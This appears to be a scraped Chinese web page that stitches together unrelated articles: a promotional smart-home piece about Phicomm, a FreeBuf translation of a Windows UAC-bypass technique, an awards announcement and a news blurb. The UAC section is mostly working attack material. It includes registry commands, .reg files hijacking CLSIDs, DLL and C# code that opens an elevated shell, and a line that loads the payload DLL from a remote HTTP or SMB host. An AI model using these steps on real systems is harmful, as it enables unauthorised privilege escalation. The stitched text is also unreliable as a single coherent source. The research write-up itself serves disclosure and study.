一方面随着生活水平的不断提高,人们不断地对居住环境提出更高的要求,越来越注重生活中每个成员的舒适、安全与便利,并且对人、家庭以及住宅小区的各个方面提出了更高的要求。

另一方面,在人工智能技术飞速发展的背景下,各种产品嵌入AI 技术衍生出智能硬件产品,智能领域进入“万物皆载体”的新阶段。在智能时代,企业的重任是:从家居环境的本性出发,用高科技智能化手段实现家居的安全、舒适、方便,让人们过上真正的智慧生活。

近几年,不论互联网科技公司小米、百度,或者是传统家居企业美的、海尔等,又或者是以斐讯为代表的创新型科技企业,都选择在这个时代扛起用科技改变生活的重任。据前瞻产业研究院《中国智能家居设备行业市场前瞻与投资报告》指出,中国智能家居市场规模在2016年明显增长,到2018年市场规模将达到1800亿元人民币,智能家居也在这几年内迎来全面爆发。

在科技企业中,小米是智能家居领域跑得最快的企业。从2013年至今,小米已经形成了通过手机或音箱进行控制的一体化智能家居系统。做手机起家的小米先是运用人工智能技术牢牢把握住了智能家居的主要入口,然后相继推出了电视、盒子、扫地机器人、电饭煲、空气净化器等智能商品,接着将所有智能设备的价格降到了普通家庭完全可以接受的水平,从而吸引了广大“米粉”的购买。但是它的产品线不如传统家电厂商全,市场占有率不足。

海尔是全球领先的家电厂商,也是传统家电厂商开拓智能家居的领军企业。其通过U+智慧生活开放平台切入,推出了以空气盒子为代表的“U+健康空气全套解决方案”;以智能冰箱为中心的“U+膳食综合解决方案”等智能家居服务,凭借丰富的产品矩阵,在智能家居市场具有很高的市场占有率和显著的品牌效应。但是海尔的智能家居还是偏传统领域,相较于科技企业,海尔在人工智能方面的积累不足,在智能家电的入口设备上没有强有力的竞争产品。

在今年中国国际信息通信展中,秉承着智能硬件免费、互联网运营和大数据云服务理念的创新型科技公司斐讯,其“金三角战略”指导下三大业务模块,Smart Home(智慧家庭)、Smart Data(智慧大数据)、Smart Life(智慧生活)成为了此次展会的亮点。斐讯发展至此已经形成了以K系列家族路由器为入口,多种智能家居产品为基础且相互关联的智能家居生活。此前,斐迅已经连续六次参加中国国际通信展,每次参展智能产品都能让人眼前一亮,而今年的智能产品更是集新颖的模式、实用的智能硬件、超智能的AI技术、大数据应用于一身,已然形成了一个完整的智慧生活圈。

智能家居企业的发展方向一直是:为全民打造一个安全,快捷,舒适的智能生活环境。然而,有数据显示,全球智能家居渗透率当属美国最高,但美国市场渗透率仅仅只达5.8%,同期中国智能家居市场渗透率也仅为0.1%,可见市场上智能家居设备的市场渗透率并不高。智能家居领域出现了一个僵局:智能家居在人工智能领域红了半边天,在民众中普及率却非常低。

由此,“如何让科技改变生活落到实处,让全民过上智慧生活?”成为智能家居企业新的议题。

一场由斐讯率先发动的“普惠科技”革命兴起

智能家居进入国内市场以来,一直以高大上的形象出现在人们的视野中。因此,当人们一听到智能家居,首先想到的就是我们在电视里面看到过的富豪豪宅里才有的东西,给我们的第一印象就是:这东西很好但很贵,用不起。

自从物联网、云计算等先进科技的应用步入正轨之后,智能产品的实用性成为智能家居企业的重点。智能产品越来越贴近生活、接地气,各大智能家居公司还为了抢占市场打起了价格战。但是仍然有很多人认为智能家居不是一个理想的消费品,真正让其花钱去体验的话还是会有疑虑。在智能家居产品久久不能落地的时候,倡导智慧家庭、智慧生活的创新型科技企业斐讯率先喊出了“普惠科技”的口号。

那么,在万物互联飞速发展的大背景下,各路新技术层出不穷,“普惠科技”到底如何实现给大众提供实惠生活?

作为“普惠科技”理念先行者的斐讯在北京国际信息通讯展上展出其Smart Home(智慧家庭)+Smart Data(智慧大数据)+Smart Life(智慧生活)三大战略“金三角战略”,为“普惠科技”做出了引领。

首先,“普惠科技”的前提是拥有健全的科技产品。斐讯推出的Smart Home版块包含了家庭网络、智能硬件及家庭自动化三大产品线的智能产品。例如:斐讯的明星产品K系列家族路由器、智能体脂秤S7、智能手环、手表等。除此之外,近日在2017年中国国际信息通信展首次亮相的斐讯空气检测仪悟空、空气净化器悟净、净水器泉+以及智能插排等产品也十分引人注目。

其次,真正的智慧生活不是智能硬件单品的堆积,而是一个整体的、相互关联的智能系统。所以需要通过优化及打通上下游环节,提升产品智慧化程度以及品牌服务能力。因此,对于“普惠科技”的践行,必须有一个精确的数据服务模式。在服务方面,斐讯Smart Home、Smart Data、Smart Life的“金三角战略”一方面以智能硬件产品为基础;另一方面,利用大数据打通终端和个人的闭环,从而为消费者提供精确服务,最终实现智慧生活。

最后,“普惠科技”最重要的一个环节是要做到普惠。而“普惠科技”一是要“普”:扩大消费者人群;二是要“惠”:降低智能产品价格。为此,斐讯先是做大消费人群进而打造全民智慧生活圈;然后通过增加产品覆盖范围的方式增强企业自身价值,从而有能力降低智能产品成本,使消费者获得最大收益。

事实上,在普惠科技给消费者带来实惠的同时,良好的市场反响也会促进企业的发展。而以健全的科技产品以及高质量的科技服务为基础,以为用户带去真正的智慧生活为目标,在斐迅的带领下智慧生活对于消费者已经不再只是一个遥远的概念。

“普惠科技”将推动全民智慧生活大步向前迈进

提起“普惠科技”,人们必然会关联起近几年的热门话题“普惠金融”。“普惠金融”是新金融发展的重要方向之一,其主要目的是能有效、全方位地为社会所有阶层和群体提供服务的金融体系。

根据央行数据显示,2016年1~6月,银行业金融机构涉农贷款余额27.3万亿元,同比增长8.7%;非银行支付机构处理网络支付业务671.14亿笔,金额41.93万亿元。随着国家对普惠金融的提倡,过去被排斥于金融服务之外的大规模客户群体也有所获益。

“促进普惠金融体系,全面建设小康社会”与“促进普惠科技体系,全面建设智慧生活”大体相同。斐讯所主张的“普惠科技”实质,就是希望像普惠金融一样让科技服务能够更快、更多、更好地在社会各阶层和群体中得到普及。

从智能科技企业角度来看,在物联网迅速发展、智能硬件越来越便宜的情况下,智能科技企业想要获取盈利越来越难,并且在众多的企业中打响自己的品牌同样困难。而“普惠科技”不仅能扩大消费群体,薄利多销,还能帮助智能产品树立更好的品牌形象。

从消费群体角度来看,互联网的快速发展使得智能家居加快进入小部分消费者的生活,而广大的90后消费群体也在渴望着更舒适、更方便、更安全和更健康的智慧生活,但智能产品高昂的价格让很多消费者望而却步,而普惠科技的推广正是让消费者实现智慧生活的最佳方式。

“普惠科技”和“普惠金融”一样是大势所趋。众所周知,任何产业的发展,都离不开金融的支持。而人工智能从诞生以来,理论和技术日益成熟,应用领域也不断扩大,可以设想人工智能带来的科技产品必将覆盖我们各个生活领域,未来任何产业的发展也都离不开人工智能的支持。

整体而言,人工智能的发展促进了智慧生活的到来,但智慧生活不是简单地通过免费智能硬件提高用户覆盖率就能轻易打造的,还需优化及打通上下游环节、整合各产业供应链从而打造出完善的智慧生活圈。而毋庸置疑的是,正如“普惠金融”加速了金融行业的发展一样,在以斐讯为代表的“普惠科技”践行者带领下,普惠科技将全面推动全民智慧生活大步向前。

刘旷,以禅道参悟互联网、微信公众号:liukuang110

.NET Framework可以通过用户定义的环境变量和CLSID注册表项加载profiler DLL或者是COM组件DLL,进程权限提升时甚至也是一样。所以通过利用自动提权.NET进程(如MMC管理单元)加载任意DLL的行为,在Windows 7到Windows 10(包括最新的RS3版本)的默认设置中绕过UAC。

介绍

简略介绍一下:去年五月,Casey Smith在推特博客上指出.NET profiler DLL的加载可能被滥用,以至于使合法的.NET应用程序会通过环境变量加载恶意DLL。

看到这个的时候,我首先想到的是“如果这个对提升过权限的.NET应用也有用,那么就绝对是个绕过UAC的好方法”。事实上确实是这样。

这个问题由Stefan Kanthak发现,且由他报告和发表。不过虽然自七月就已经被公开,但我写这篇文章的时候问题依然没有被修复,甚至现在都依然如此。

绕过UAC

要使.NET应用程序加载任意DLL,我们可以使用以下环境变量:

COR_ENABLE_PROFILING=1
COR_PROFILER={GUID}
COR_PROFILER_PATH=C:\path\to\some.dll

在4以下的版本,CLSID必须通过包含profiler DLL路径的注册表键HKCR\CLSID{GUID}\InprocServer32进行定义,在最新版本中,CLR使用COR_PROFILER_PATH环境变量来查找DLL,如果未定义COR_PROFILER_PATH,则使用CLSID。

HKCR\CLSID是HKLM和HKCU中Software\Classes\CLSID的组合,在HKLM(或Mechine级环境变量)中创建CLSID键需要提权,但在HKCU中则不需要,需要注意的是,如果是user级别的环境变量和注册表项,那么也会有用。

现在我们只需要一个自动提权的可执行文件(在默认设置下没有UAC提示符),并使用.NET CLR加载虚假profiler DLL。MMC是个不错的选择,在测试中,我使用gpedit MMC,不过还有其他可用的(稍后会有例子)。

如批处理一样简单,让其工作起来:

REG ADD "HKCU\Software\Classes\CLSID\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\InprocServer32" /ve /t REG_EXPAND_SZ /d "C:\Temp\test.dll" /f
REG ADD "HKCU\Environment" /v "COR_PROFILER" /t REG_SZ /d "{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}" /f
REG ADD "HKCU\Environment" /v "COR_ENABLE_PROFILING" /t REG_SZ /d "1" /f
REG ADD "HKCU\Environment" /v "COR_PROFILER_PATH" /t REG_SZ /d "C:\Temp\test.dll" /f
mmc gpedit.msc

在低权限环境下,这些命令会通过高权限进程mmc.exe加载C:\Temp\test.dll (如果存在的话)。

这允许在Windows 7到Windows 10的默认设置(包括本文中最新的RS3版本)中的UAC绕过。

如何通过.NET程序绕过UAC

点击这里查看】嵌入DLL的PowerShell PoC(仅限64位)

DLL只是在DLL_PROCESS_ATTACH上运行cmd.exe,产生一个提权过的shell,然后立即退出当前进程,以防止MMC控制台弹出:

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)

{

    char cmd[] = "cmd.exe";

    switch (fdwReason)

    {

    case DLL_PROCESS_ATTACH:

        WinExec(cmd, SW_SHOWNORMAL);

        ExitProcess(0);

        break;

    case DLL_THREAD_ATTACH:

        break;

    case DLL_THREAD_DETACH:

        break;

    case DLL_PROCESS_DETACH:

        break;

    }

    return TRUE;

}

在x64 Windows 7,8.1,10 1703和10 RS3版本16275中已测试。

当然,如果你有一个可访问的SMB共享,​​那么它也适用于UNC路径:

COR_PROFILER_PATH=\\server\share\test.dll

根本原因

COM以运行时高权限进程会阻止CLSID在用户注册表(HKCU)中查找,以防止绕过,但.NET运行时并不会,在这种情况下,会由后者执行查找。

如何通过.NET程序绕过UAC

如果要修复,CLR的检查需要和COM的相似。

其他载体

现在我们知道CLR是如何工作的,我们可以通过在堆栈中使用CLR调用,在HKCU中检查CLSID查找来找到其他实例。

“Microsoft.GroupPolicy.AdmTmplEditor.GPMAdmTmplEditorManager” 组件(在我的虚拟机上,CLSID 是{B29D466A-857D-35BA-8712-A758861BFEA1} )

如何通过.NET程序绕过UAC

HKCR中的现有项似乎表明组件本身在CLR程序集中实现:

如何通过.NET程序绕过UAC

我们可以在用户注册表中定义一个COM项(.reg格式):

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{B29D466A-857D-35BA-8712-A758861BFEA1}]

@="Microsoft.GroupPolicy.AdmTmplEditor.GPMAdmTmplEditorManager"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{B29D466A-857D-35BA-8712-A758861BFEA1}\Implemented Categories]

[HKEY_CURRENT_USER\Software\Classes\CLSID\{B29D466A-857D-35BA-8712-A758861BFEA1}\Implemented Categories\{62C8FE65-4EBB-45E7-B440-6E39B2CDBF29}]

[HKEY_CURRENT_USER\Software\Classes\CLSID\{B29D466A-857D-35BA-8712-A758861BFEA1}\InprocServer32]

@="C:\\Windows\\System32\\mscoree.dll"

"Assembly"="TestDotNet, Version=0.0.0.0, Culture=neutral"

"Class"="TestDotNet.Class1"

"RuntimeVersion"="v4.0.30319"

"ThreadingModel"="Both"

"CodeBase"="file://C://Temp//test_managed.dll"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{B29D466A-857D-35BA-8712-A758861BFEA1}\InprocServer32\10.0.0.0]

"Assembly"="TestDotNet, Version=0.0.0.0, Culture=neutral"

"Class"="TestDotNet.Class1"

"RuntimeVersion"="v4.0.30319"

"CodeBase"="file://C://Temp//test_managed.dll"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{B29D466A-857D-35BA-8712-A758861BFEA1}\ProgId]

@="Microsoft.GroupPolicy.AdmTmplEditor.GPMAdmTmplEditorManager"

然后,MMC将加载我们的托管DLL并尝试访问TestDotNet.Class1类。默认情况下,C#没有一个简单的方法来创建DLL入口点,如DllMain,但在注册表中引用的类似乎被加载了,所以我们可以使用一个静态构造函数来执行我们的提权代码:

using System;

using System.Diagnostics;

namespace TestDotNet

{

   public class Class1

   {

      static Class1()

      { 

         Process.Start("cmd.exe");

         Environment.Exit(0);

      }

   }

}

将DLL放在所定义的位置,运行gpedit.msc会出现一个提权的shell(这次是从一个.NET DLL)

如何通过.NET程序绕过UAC

如何通过.NET程序绕过UAC

该方法的一个有趣的地方是CodeBase参数并不限于本地文件和SMB共享,​​还可以从HTTP URL加载DLL:

"CodeBase"="http://server:8080/test_managed.dll"

要注意的是,下载的DLL会被复制到磁盘,所以该方法实际上比本地DLL(磁盘+网络)更容易被检测到。

另一件好事(对于攻击者来说):有多种CLSID可以这样被滥用。

以下可以与compmgmt.msc,eventvwr.msc,secpol.msc和taskschd.msc一起使用:

托管DLL的Microsoft.ManagementConsole.Advanced.FrameworkSnapInFactor组件

如何通过.NET程序绕过UAC

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{D5AB5662-131D-453D-88C8-9BBA87502ADE}]

@="Microsoft.ManagementConsole.Advanced.FrameworkSnapInFactory"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{D5AB5662-131D-453D-88C8-9BBA87502ADE}\Implemented Categories]

[HKEY_CURRENT_USER\Software\Classes\CLSID\{D5AB5662-131D-453D-88C8-9BBA87502ADE}\Implemented Categories\{62C8FE65-4EBB-45e7-B440-6E39B2CDBF29}]

[HKEY_CURRENT_USER\Software\Classes\CLSID\{D5AB5662-131D-453D-88C8-9BBA87502ADE}\InprocServer32]

@="C:\\Windows\\System32\\mscoree.dll"

"Assembly"="TestDotNet, Version=0.0.0.0, Culture=neutral"

"Class"="TestDotNet.Class1"

"RuntimeVersion"="v2.0.50727"

"ThreadingModel"="Both"

"CodeBase"="file://C://Temp//test_managed.dll"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{D5AB5662-131D-453D-88C8-9BBA87502ADE}\InprocServer32\3.0.0.0]

"Assembly"="TestDotNet, Version=0.0.0.0, Culture=neutral"

"Class"="TestDotNet.Class1"

"RuntimeVersion"="v2.0.50727"

"CodeBase"="file://C://Temp//test_managed.dll"

“NDP SymBinder”组件作为本地DLL,通过\Server项劫持:

如何通过.NET程序绕过UAC

Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}]

@="NDP SymBinder"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32]

@="C:\\Windows\\System32\\mscoree.dll"

"ThreadingModel"="Both"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32\4.0.30319]

@="4.0.30319"

"ImplementedInThisVersion"=""

[HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\ProgID]

@="CorSymBinder_SxS"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server]

@="C:\\Temp\\test_unmanaged.dll"

“Microsoft Common Language Runtime Meta Data”组件作为本地DLL,通过\Server项劫持(仅限secpol.msc)

如何通过.NET程序绕过UAC

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}]

@="Microsoft Common Language Runtime Meta Data"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\InprocServer32]

@="C:\\Windows\\System32\\mscoree.dll"

"ThreadingModel"="Both"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\InprocServer32\4.0.30319]

@="4.0.30319"

"ImplementedInThisVersion"=""

[HKEY_CURRENT_USER\Software\Classes\CLSID\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\ProgID]

@="CLRMetaData.CorRuntimeHost.2"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\Server]

@="..\\..\\..\\..\\Temp\\test_unmanaged.dll"

(注意:这里的路径必须是相对的,否则mmc.exe会尝试加载C\Windows\Microsoft.NET\Framework64\v4.0.30319\C\Temp\test_unmanaged.dll)

UAC并非安全防御

微软反复声明UAC不是安全边防,而安全人员通常以更实际的方式描述它:不要信任UAC,不用管理员权限时,使用非管理员账户,我非常同意这一点。

尽管如此,很多人还是以本地管理员身份运行,这些人理所当然成了渗透测试者和red teamer的目标。

作为渗透测试目的,我推荐来自@tiraniddo的更一般的方法(示例的实现点这里,另一个 即将发布),这种方法不需要DLL。

此外,如果你想深入了解UAC绕过,那么会有很多资源,以下是必读内容:

@enigma0x3‘s research (and his upcoming DerbyCon talk)

@tiraniddo‘s bypass techniques on UAC via the SilentCleanup task and process token reading: part 1, part 2 & part 3

@hFireF0X‘s UACME project that implements most known UAC bypasses, and his posts on kernelmode

@FuzzySec‘s UAC workshop, and his Bypass-UAC project that implements several bypasses in PowerShell

*参考来源:provadys,Covfefe编译,转载请注明来自FreeBuf.COM

人类历史最近的两百多年先后经历了三次工业技术革命,自瓦特发明的蒸汽机伊始,蒸汽技术革命,电力技术革命,信息技术革命接替而来。每一次的技术革新都在推动者人类社会向更高层次的文明水平迈进。而今,以互联网产业化,工业智能化,工业一体化为代表,以 人工智能,量子信息技术,虚拟现实技术等为主的第四次技术革命正在到来。

安全行业总与技术创新息息相关,在这个IT技术大发展大变革的时代,安全行业又将迎来一场怎样的“革命”?

2017年,我们看到大数据、机器学习的重要性不断提升,众多安全厂商都投入了巨大的人力、物力进行相关研究、创新,以期通过技术革新形成核心竞争力。在本年度发布的众多安全产品中,哪一次技术突破最引人瞩目?哪一项技术创新引领了行业潮流?哪一项技术变革代表着行业未来?

WitAwards2017「年度技术变革」评选,唯技术创新成果论英雄。

年度技术变革.png

WitAwards 2017年度技术变革 报名/提名通道

http://cn.mikecrm.com/7Ghoi01

WitAwards2016年度技术变革得主:「东巽科技 铁穹高级持续性威胁预警系统」回顾

「铁穹高级持续性威胁预警系统」(以下简称铁穹系统)是东巽科技自主研发的深度威胁分析平台,采用大数据处理架构集合行为分析、虚拟执行、多维关联分析、机器学习等先进技术,针对APT攻击中广泛采用的0DAY和NDAY漏洞、特种木马、渗透入侵等技术进行判断识别,拦截鱼叉式钓鱼攻击、水坑攻击等典型APT攻击,挖掘网络空间中的已知和未知攻击威胁,从而实现对APT攻击全生命周期进行全方位的预警。

图片 1.png

东巽科技CTO 李薛

东巽科技CTO李薛在WitAwards 2016颁奖典礼上表示,“回顾2016年公司的技术发展,战术上我们研究机器学习、反沙箱逃逸、流量行为分析等具体技术实现并在同类产品中形成了一定的技术优势。战略上我们构建的是云端威胁情报、管道端流量分析的高级威胁预警、终端上的edr取证分析、地端高级人工服务,形成了一整套高级安全运营体系,帮助客户发现问题、处置问题,解决安全隐患。”

关于APT攻击

防范APT攻击需要极高的技术门槛,以及专业的安全团队。从技术上讲,传统的技术防范手段已经严重滞后于日益精进的网络攻击手段,尤其在移动网络技术迅猛发展的近几年内,伴随APP、WIFI、光通信、云存储等技术手段的不断成熟与应用,网络攻击方式更加呈现出多样化、复杂化的特点。伴随两化融合的进程,制造、能源、军工等国家重要基础设施领域正在进行信息化与工业化的快速融合与技术升级,在转型中,工业生产领域暴露出众多落后的计算机与通信技术,给攻击者留下许多可趁之机。

作为目前主流的防御技术和手段,防火墙基于IP和端口进行拦截,缺乏对内容的深度分析和威胁检测;入侵检测基于攻击特征检测,误报率高且容易被伪装绕过;杀毒软件基于代码指纹进行检测易被免杀绕过,并且难以识别未知恶意代码等等。

铁穹系统的技术革新

东巽科技的铁穹系统是国内首个提出“云、管、端、地”的四维防御APT攻击的方案。并在产品中采用机器学习、反沙箱逃逸、流量行为分析等各类“下一代技术”来发现外部的Web、邮件、文件的各种高级攻击行为,及时发现网络中已被黑客控制的失陷主机等各类威胁问题,为政府、军队、军工、央企、金融、运营商等客户面临的高级威胁攻击风险提供有力安全保障。

 “云端平台”为“管端”和“终端”的产品提供最新的威胁情报,扩展其 “知识”,对于高级恶意代码可以在云端通过更强分析能力的平台协助分析,扩展用户侧产品的“能力”。

“管端”设备通过流量的集中分析可以集约、快速的定位“被攻击”和“被攻陷”终端线索。

“终端”明镜产品基于“管端”的线索信息,在威胁或可疑终端上进行集中的取证、检测和处置。

“地端”高级安全服务可以基于上述技术手段开展工作,贯穿评估、响应、溯源等多个端到端的环节。

 6b840f89d69aae9c.jpg

率先引入机器学习

东巽科技的铁穹系统是国内率先引入机器学习的安全产品之一。东巽科技CTO李薛表示,“近年不断出现新型网络攻击方式,每天增加大量的恶意样本数量,但分析与判别是两回事。面对大量恶意样本数据,利用机器学习并进行大数据分析才是合理的解决之道。”

机器学习与网络安全是完全不同的两个领域,两个领域在知识结构上存在很大的差异,而且在各自的领域,如果想做出成果都需要极高的门槛。未来还有很多工作需要落地,比如优化输入的数据,尝试对输入数据进行更为细致的标签分类、引入特定行为检测规则作为抽取特征的一部分、降维去噪,做特征统计和人工分析,筛选掉一些效果不明显的特征、尝试不同算法&不同特征向量的搭配组合、增加静态分析的数据并抽取相应的高价值特征等等。

对此李薛做了一个比喻,他说“在利用机器学习检测恶意样本方向上,就是刚刚上路而已,未来的路还很远很长,在未来的路上会有山有水有河流,当然也有鲜花和果实。未来充满期待。”

往届官网

评选流程及规则

评选分为线上提名、公众投票、专家评选及现场颁奖四个阶段。

各奖项将根据公众投票(20%),行业评委投票(30%)以及专家评委投票(50%)决定归属。最终获奖名单将在「FIT 2018互联网安全创新大会」上公布并进行现场颁奖,获奖嘉宾也将受邀进行现场演讲。

评选流程.png

* 特别说明:

1、为了保证WitAwards 2017 公平性和公正性,活动主办方 FreeBuf 的商标持有者上海斗象信息科技有限公司及旗下的任何品牌、技术、组织和个人弃权不参与本次评选,并通过此公示承诺其评选的独立性和权威性;

2、参与WitAwards 评选任何一个环节均采取公平公正公开的方式,包括报名、计票及最终获奖,组委会不收取任何费用。

­­传送门:WitAwards 2017官网

本周梗概

本周BUF大事件又为大家带来了成吨新鲜有趣的安全新闻,全球四大会计师事务所之一的德勤遭到网络攻击,全球电子邮件服务器被入侵;维基解密发布俄罗斯国家监控设施机密文件;渗透测试工具Burp Suite被曝存在远程代码执行漏洞。想要了解详情,请看本周的BUF大事件吧!

观看视频

看不到视频点这里

* 本文作者:willhuang,FreeBuf视频组荣誉出品,转载须注明来自FreeBuf.COM